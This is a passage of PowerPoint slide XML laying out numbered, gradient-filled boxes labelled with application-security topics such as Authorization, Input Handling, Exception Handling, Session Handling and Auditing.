        <p:nvGrpSpPr>
          <p:cNvPr id="1322" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2086186" y="5039359"/>
            <a:ext cx="9261406" cy="819575"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9261404" cy="819573"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1320" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9261405" cy="819574"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="D5D69C"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EEEFD7"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1321" name="Input Handling"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="63838"/>
              <a:ext cx="9241372" cy="691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47" tIns="130047" rIns="130047" bIns="130047" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3000"/>
                <a:t>Input Handling</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1325" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1442719" y="5125155"/>
            <a:ext cx="557673" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="557671" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="557672" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="000000"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CECECE"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1324" name="4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="108999" y="12445"/>
              <a:ext cx="339673" cy="625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3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1328" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2086186" y="6039555"/>
            <a:ext cx="9261406" cy="819575"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9261404" cy="819573"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1326" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9261405" cy="819574"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="D5D69C"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EEEFD7"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1327" name="Exception Handling"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="63838"/>
              <a:ext cx="9241372" cy="691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47" tIns="130047" rIns="130047" bIns="130047" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3000"/>
                <a:t>Exception Handling </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1331" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1442719" y="6125351"/>
            <a:ext cx="557673" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="557671" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1329" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="557672" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="000000"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CECECE"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1330" name="5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="108999" y="12445"/>
              <a:ext cx="339673" cy="625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3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1334" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2086186" y="3005102"/>
            <a:ext cx="9261406" cy="891823"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9261404" cy="891822"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1332" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9261405" cy="891823"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="D5D69C"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EEEFD7"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1333" name="Authorization"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10900" y="99963"/>
              <a:ext cx="9239606" cy="691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47" tIns="130047" rIns="130047" bIns="130047" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3000"/>
                <a:t>Authorization</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1337" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1442719" y="3124764"/>
            <a:ext cx="557673" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="557671" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1335" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="557672" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="000000"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CECECE"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1336" name="2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="108999" y="12445"/>
              <a:ext cx="339673" cy="625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3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1340" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2050062" y="7001368"/>
            <a:ext cx="9261405" cy="819575"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9261404" cy="819573"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1338" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9261405" cy="819574"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="D5D69C"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EEEFD7"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1339" name="Session Handling"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="63838"/>
              <a:ext cx="9241372" cy="691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47" tIns="130047" rIns="130047" bIns="130047" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3000"/>
                <a:t>Session Handling </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1343" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1406595" y="7087164"/>
            <a:ext cx="557672" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="557671" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1341" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="557672" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="000000"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CECECE"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1342" name="6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="108999" y="12445"/>
              <a:ext cx="339673" cy="625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3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1346" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2031999" y="7963182"/>
            <a:ext cx="9261406" cy="819574"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9261404" cy="819573"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1344" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9261405" cy="819574"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="D5D69C"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EEEFD7"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1345" name="Auditing"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="63838"/>
              <a:ext cx="9241372" cy="691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47" tIns="130047" rIns="130047" bIns="130047" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:defRPr sz="3000">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3000"/>
                <a:t>Auditing </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1349" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
